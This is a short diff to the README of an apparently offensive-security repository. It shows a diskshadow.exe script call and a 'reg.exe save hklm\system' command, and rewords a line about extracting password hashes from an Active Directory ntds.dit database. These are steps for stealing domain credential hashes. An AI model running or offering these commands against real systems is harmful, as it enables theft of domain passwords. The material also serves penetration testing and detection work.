codebycamk/DiskShadowCopyNtds/README.md

 diskshadow.exe /s c:\windows\temp\diskshadow.txt

-To extract password hashes, you will also get an extract of SYSTEM from the registry:
+If you plan to extract password hashes from ntds.dit, you will also get a dump of SYSTEM from the registry:

 reg.exe save hklm\system c:\windows\temp\reg.bak